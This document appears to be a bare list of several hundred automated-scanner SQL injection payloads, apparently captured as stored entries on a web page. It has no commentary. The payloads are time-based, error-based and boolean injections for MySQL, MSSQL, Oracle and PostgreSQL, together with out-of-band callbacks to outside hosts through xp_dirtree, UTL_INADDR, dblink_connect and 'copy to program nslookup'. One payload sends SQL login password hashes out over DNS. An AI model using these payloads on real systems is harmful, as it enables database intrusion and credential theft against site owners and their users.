| |
|
%27
| |
|
'
| |
|
' WAITFOR DELAY '0:0:25'--
| |
|
') WAITFOR DELAY '0:0:25'--
| |
|
')) WAITFOR DELAY '0:0:25'--
| |
|
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
| |
|
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
| |
|
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
| |
|
'+NSFTW+'
| |
|
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
| |
|
'||(SELECT dblink_connect('host=ahvohbmwi1h7_q3an30tdrwtcvmlbayznskalm2a'||'exo.r87.me user=a password=a connect_timeout=2'))||'
| |
|
'||(SELECT dblink_connect('host=ffwyu5yplbnrn-ea8-_7zeyaczbtjswpdveacajf'||'9ny.r87.me user=a password=a connect_timeout=2'))||'
| |
|
'||(SELECT dblink_connect('host=ffwyu5yplbuis8t157irq2uaxxnj1e0xcbakcdjz'||'bxo.r87.me user=a password=a connect_timeout=2'))||'
| |
|
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
| |
|
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ahvohbmwi11kohrujtui7n_ecoykgopkgslujc4o'||'lvy.r87.me') from DUAL))||'
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplb-q_h0a07pmcwo5oytvfqjdbm2xuhfo'||'ixy.r87.me') from DUAL))||'
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplbmjbmwodcveo8aigui45ci5idmvkemp'||'huq.r87.me') from DUAL))||'
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(107)||chr(112)||chr(54)||chr(115)||c
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(114)||chr(111)||chr(49)||chr(102)||c
| |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(104)||chr(118)||chr(111)||chr(104)||chr(98)||chr(109)||chr(119)||chr(105)||chr(49)||chr(107)||chr(98)||chr(57)||chr(115)||chr
| |
|
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.372-3180.372.1d871.1.bxss'||'.me')||'
| |
|
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.372-3281.372.1d871.1.bxss'||'.me')||'
| |
|
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.372-3307.372.1d871.1.bxss'||'.me')||'
| |
|
((SELECT 1 FROM (SELECT SLEEP(25))A))
| |
|
((select sleep(25)))a-- 1
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ahvohbmwi1vfmhsgtvnxa0np1hxxvat2hayyagif'||'9ew.r87.me') from DUAL))))
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplbsxv-p4mel_ilvdtt2ajxhuelcrzyf2'||'8tk.r87.me') from DUAL))))
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplbtdc6vnsxer8kclkyn1ahxhrtokzxie'||'cbc.r87.me') from DUAL))))
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(107)||chr(106)||chr(107)||chr(5
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(56)||chr(114)||chr(102)||chr(12
| |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(104)||chr(118)||chr(111)||chr(104)||chr(98)||chr(109)||chr(119)||chr(105)||chr(49)||chr(48)||chr(49)||chr(105)||chr(112)
| |
|
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
| |
|
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
| |
|
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
| |
|
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
| |
|
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS('ahvohbmwi1afz21omwf8cxuiz8j5qm4x1k15no8s'||'q38.r87.me') from DUAL)
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplb5r-z0j65o0qdqpvm6huzrlvojzfro1'||'4xw.r87.me') from DUAL)
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS('ffwyu5yplbgd9klm-bvfoysx2bmsjdoulmbav9es'||'oau.r87.me') from DUAL)
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(111)||chr(108)||chr(97)||chr(118)||chr(52)||chr(53)||chr(100)|
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(116)||chr(121)||chr(120)||chr(113)||chr(97)||chr(114)||chr(97)
| |
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(104)||chr(118)||chr(111)||chr(104)||chr(98)||chr(109)||chr(119)||chr(105)||chr(49)||chr(54)||chr(106)||chr(109)||chr(107)||chr(101)||chr(114)||chr(56)|
| |
|
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
| |
|
(select(0)from(select(sleep(27)))v)/*'+(select(0)from(select(sleep(27)))v)+'"+(select(0)from(select(sleep(27)))v)+"*/
| |
|
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
| |
|
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
| |
|
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
| |
|
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFOR
| |
|
-1 OR 2+106-106-1=0+0+0+1
| |
|
-1 OR 2+144-144-1=0+0+0+1 --
| |
|
-1 OR 2+269-269-1=0+0+0+1
| |
|
-1 OR 2+463-463-1=0+0+0+1 --
| |
|
-1 OR 2+86-86-1=0+0+0+1 --
| |
|
-1 OR 2+964-964-1=0+0+0+1
| |
|
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM
| |
|
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
| |
|
-1" OR 2+263-263-1=0+0+0+1 --
| |
|
-1" OR 2+686-686-1=0+0+0+1 --
| |
|
-1" OR 2+760-760-1=0+0+0+1 --
| |
|
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR
| |
|
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM
| |
|
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
| |
|
-1' OR 2+446-446-1=0+0+0+1 --
| |
|
-1' OR 2+519-519-1=0+0+0+1 or 'Umi9QCdd'='
| |
|
-1' OR 2+532-532-1=0+0+0+1 --
| |
|
-1' OR 2+677-677-1=0+0+0+1 --
| |
|
-1' OR 2+700-700-1=0+0+0+1 or 'GwutcGw6'='
| |
|
-1' OR 2+848-848-1=0+0+0+1 or 'ltwcuE74'='
| |
|
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCH
| |
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ahvohbmwi1gslmon7p9ztnd-ownmllxvomrreb7h'+'_xs.r87.me
| |
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplb0qxafnvakwob3edmgu5afpmjgnp9d0'+'kte.r87.me
| |
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplbf9u5v3baeerpbveqrvx10mccncl9mp'+'onu.r87.me
| |
|
-1';exec('xp_dirtree ''\\ahvohbmwi1uv7m4o3y4x61rmztwq1mehkpnhbobk'+'mya.r87.me'+'\c$\a''')--
| |
|
-1';exec('xp_dirtree ''\\ffwyu5yplbhe9xhxngqqp5bax1piboaqhh0bi4zn'+'gv0.r87.me'+'\c$\a''')--
| |
|
-1';exec('xp_dirtree ''\\ffwyu5yplbxjbifwqlllbl-09re4k3bjeovzf4_i'+'p0c.r87.me'+'\c$\a''')--
| |
|
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select
| |
|
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
| |
|
1 AND 'NS='ss
| |
|
1 OR 17-7=10
| |
|
1 OR 1=1
| |
|
1 OR X='ss
| |
|
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
| |
|
1 waitfor delay '0:0:12' --
| |
|
1 WAITFOR DELAY '0:0:25'--
| |
|
1 waitfor delay '0:0:3' --
| |
|
1 waitfor delay '0:0:9' --
| |
|
1\x00
| |
|
1' OR 1=1 OR '1'='1
| |
|
1' OR 1=1 OR 'ns'='ns
| |
|
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
| |
|
1'"
| |
|
1'))exec('xp_dirtree ''\\ahvohbmwi1jb-aksbegckhrkddsh9vvbcpb02w3v'+'d0a.r87.me'+'\c$\a''')--
| |
|
1'))exec('xp_dirtree ''\\ffwyu5yplbh530llg8fig3puiuneu7bkdg9ravyq'+'bpw.r87.me'+'\c$\a''')--
| |
|
1'))exec('xp_dirtree ''\\ffwyu5yplbm7_xvgdxkkfrzwxzog5ujndcvavvtb'+'zga.r87.me'+'\c$\a''')--
| |
|
1')exec('xp_dirtree ''\\ahvohbmwi1xyqgyjwnlrzki3qpwe0emxipksxkt8'+'kpk.r87.me'+'\c$\a''')--
| |
|
1')exec('xp_dirtree ''\\ffwyu5yplbh6pjetxpyzfdw0r-uz78y8_ijy4e6e'+'p60.r87.me'+'\c$\a''')--
| |
|
1')exec('xp_dirtree ''\\ffwyu5yplbnm77qgtf3z1iacsz3_w2dqbrygbc0s'+'mfe.r87.me'+'\c$\a''')--
| |
|
1) exec('xp_dirtree ''\\ahvohbmwi1w1ovuogkfydnpsqdlpezo5t9mcrxlj'+'9x8.r87.me'+'\c$\a''')--
| |
|
1) exec('xp_dirtree ''\\ffwyu5yplb8hyc53khkziqm6by-fzfjdqsm3ctjw'+'3we.r87.me'+'\c$\a''')--
| |
|
1) exec('xp_dirtree ''\\ffwyu5yplbilimn9eh3plgz1tjirzwfrbfkhinbc'+'g_e.r87.me'+'\c$\a''')--
| |
|
1) WAITFOR DELAY '0:0:25'--
| |
|
1)) WAITFOR DELAY '0:0:25'--
| |
|
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
| |
|
1))exec('xp_dirtree ''\\ahvohbmwi1c0fhaakm1ngdtvdeqj1totq_jds_lk'+'ooc.r87.me'+'\c$\a''')--
| |
|
1))exec('xp_dirtree ''\\ffwyu5yplbixtxv4kxoa9mrsx9y3lzbsntazb3-2'+'oqe.r87.me'+'\c$\a''')--
| |
|
1))exec('xp_dirtree ''\\ffwyu5yplbsbgvyqckwdbz9qzqedg5drqcbhngmt'+'4dk.r87.me'+'\c$\a''')--
| |
|
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
| |
|
116'
| |
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ahvohbmwi1zzfdogzikp9_jduwfln4db3p-49yhw'+'yok.r87.me')
| |
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplb0yptuvvackyxnmeuldm0onbsoqt8wl'+'bam.r87.me')
| |
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplbaxwk4afnbrumqwnuxfl9_zf8qcouyv'+'oxe.r87.me')
| |
|
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
| |
|
1;exec('xp_dirtree ''\\ahvohbmwi1si6qymvp13wvzbgxn_9-1x8iicsi8e'+'rjs.r87.me'+'\c$\a''')--
| |
|
1;exec('xp_dirtree ''\\ffwyu5yplb120imzw8-k2w-wwwt6ueo8co_ookp0'+'ma0.r87.me'+'\c$\a''')--
| |
|
1;exec('xp_dirtree ''\\ffwyu5yplbr_y21brilosvtczhj1cl5liai9ol0c'+'i1i.r87.me'+'\c$\a''')--
| |
|
5qId418C
| |
|
692'
| |
|
722'
| |
|
74fCicHj'; waitfor delay '0:0:9' --
| |
|
@@aM9MY
| |
|
@@hErj1
| |
|
@@IpG5D
| |
|
anuwxajs
| |
|
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
| |
|
cast((SELECT dblink_connect('host=ahvohbmwi1yofu0hbzfsandapq2f5x6or8b4st0w'||'nfc.r87.me user=a password=a connect_timeout=2')) as numeric)
| |
|
cast((SELECT dblink_connect('host=ffwyu5yplb9tijrf52g1wcytvmxfdcvmcaftbzva'||'in0.r87.me user=a password=a connect_timeout=2')) as numeric)
| |
|
cast((SELECT dblink_connect('host=ffwyu5yplbthc1yox8_ei7c5xtvqu6xnlub38ebv'||'tly.r87.me user=a password=a connect_timeout=2')) as numeric)
| |
|
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(112)||chr(53)||chr(11
| |
|
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(102)||chr(102)||chr(119)||chr(121)||chr(117)||chr(53)||chr(121)||chr(112)||chr(108)||chr(98)||chr(113)||chr(49)||chr(48
| |
|
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(97)||chr(104)||chr(118)||chr(111)||chr(104)||chr(98)||chr(109)||chr(119)||chr(105)||chr(49)||chr(98)||chr(119)||chr(101
| |
|
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
| |
|
dblink_connect('host=ahvohbmwi1mchzmkg9ebzpuesppesjiebehsow-i'||'ps4.r87.me user=a password=a connect_timeout=2')
| |
|
dblink_connect('host=ffwyu5yplb6n9bsrtpmioxptajr52hp1sejrhwnw'||'ds4.r87.me user=a password=a connect_timeout=2')
| |
|
dblink_connect('host=ffwyu5yplb_x_eetyu5xn2s-2ggs71wgtt3t-8fd'||'h2o.r87.me user=a password=a connect_timeout=2')
| |
|
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.ahvohbmwi1gnxqtusyeeagwnf5q-9kzdu2__amfz'+'uj4.r87.me' from sys.sql_logins WHERE
| |
|
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.ffwyu5yplb3reyyltlbqq_dmwk5zntpzszek8lr_'+'s_g.r87.me' from sys.sql_logins WHERE
| |
|
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.ffwyu5yplbm_echir7gohwnn5vrr00s9nfiksiv9'+'vb0.r87.me' from sys.sql_logins WHERE
| |
|
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ahvohbmwi1q6vsnjgndpmp0ndgrr13png8mrghfv'+'xzq.r87.me')ex
| |
|
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplbkkier2thatz6n_nnrvihjqthz9x78p'+'ulg.r87.me')ex
| |
|
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ffwyu5yplbmeynvdtxjfbmaqreql3wbky01uhkf1'+'psk.r87.me')ex
| |
|
dfxiqlqr
| |
|
dfxiqlqr';copy (select '') to program 'nslookup dns.sqli.\013405.372-3198.372.1d871.\1.bxss.me
| |
|
dfxiqlqr';copy (select '') to program 'nslookup dns.sqli.\013405.372-3283.372.1d871.\1.bxss.me
| |
|
dfxiqlqr';copy (select '') to program 'nslookup dns.sqli.\013405.372-3313.372.1d871.\1.bxss.me
| |
|
et3IY040'));select pg_sleep(9); --
| |
|
exec('xp_dirtree ''\\ahvohbmwi18jzaqsoz_u7-n7jnuyaoptpfpoz4ph'+'njc.r87.me'+'\c$\a''')
| |
|
exec('xp_dirtree ''\\ffwyu5yplbattrm6x-x1ukroxayungv8ngeum2ek'+'edw.r87.me'+'\c$\a''')
| |
|
exec('xp_dirtree ''\\ffwyu5yplbj3gsbsggprhnonkr1a4_tsy0eolekl'+'pog.r87.me'+'\c$\a''')
| |
|
FNLrBURh'));select pg_sleep(18); --
| |
|
hkhnywry
| |
|
iEHm1x7Z
| |
|
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
| |
|
if(now()=sysdate(),sleep(27),0)/*'XOR(if(now()=sysdate(),sleep(27),0))OR'"XOR(if(now()=sysdate(),sleep(27),0))OR"*/
| |
|
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
| |
|
ij8Q0XwE'; waitfor delay '0:0:12' --
| |
|
Iwm6kT15';select pg_sleep(9); --
| |
|
JyI=
| |
|
KBxtRdae'));select pg_sleep(9); --
| |
|
kxxbaxor
| |
|
Lxl2v8rH';select pg_sleep(6); --
| |
|
mgivuagp
| |
|
NS1NO
| |
|
NSFTW
| |
|
NSSmithNO
| |
|
PhL79Cdb'; waitfor delay '0:0:3' --
| |
|
qctjvbdy
| |
|
qloZWx9W');select pg_sleep(9); --
| |
|
qmdrfeyv
| |
|
rqTwubFJ');select pg_sleep(18); --
| |
|
SELECT dblink_connect('host=ahvohbmwi16eq7lir0durevgbhtd5ke3sfriyx7z'||'te8.r87.me user=a password=a connect_timeout=2')
| |
|
SELECT dblink_connect('host=ffwyu5yplbkej23fdi6hvsrrapxv2ceb2hi9ub2z'||'evw.r87.me user=a password=a connect_timeout=2')
| |
|
SELECT dblink_connect('host=ffwyu5yplb_7roftfbmwilpri_fzycoee1uog3xj'||'z7w.r87.me user=a password=a connect_timeout=2')
| |
|
SELECT pg_sleep(25)--
| |
|
Smith
| |
|
Smith + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
| |
|
Smith AND 'NS='ss
| |
|
Smith OR X='ss
| |
|
Smith" OR 1=1 OR "1"="1
| |
|
Smith" OR 1=1 OR "ns"="ns
| |
|
Smith' OR 1=1 OR '1'='1
| |
|
Smith' OR 1=1 OR 'ns'='ns
| |
|
Smith'));SELECT pg_sleep(25)--
| |
|
Smith');SELECT pg_sleep(25)--
| |
|
Smith';SELECT pg_sleep(25)--
| |
|
Smith));SELECT pg_sleep(25)--
| |
|
Smith);SELECT pg_sleep(25)--
| |
|
Smith;SELECT pg_sleep(25)--
| |
|
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
| |
|
syscolumns WHERE 2>3;exec('xp_dirtree ''\\ahvohbmwi1qde5oa1mddum8e3rotdur94ytl9gx9'+'dyq.r87.me'+'\c$\a''')--
| |
|
syscolumns WHERE 2>3;exec('xp_dirtree ''\\ffwyu5yplbjcsvj3zgpai_tanojnrpv-plx6jfw0'+'2i4.r87.me'+'\c$\a''')--
| |
|
syscolumns WHERE 2>3;exec('xp_dirtree ''\\ffwyu5yplbqen9l8smy0am0qvvteb46lu9rlzybi'+'p80.r87.me'+'\c$\a''')--
| |
|
UKs8dWsx';select pg_sleep(18); --
| |
|
WAITFOR DELAY '0:0:25'--
| |
|
wNWYUyqj
| |
|
y88ncGWq';select pg_sleep(0); --
| |
|
yadVYBbZ');select pg_sleep(6); --
| |
|
yeunblwh
| |
|
\
| |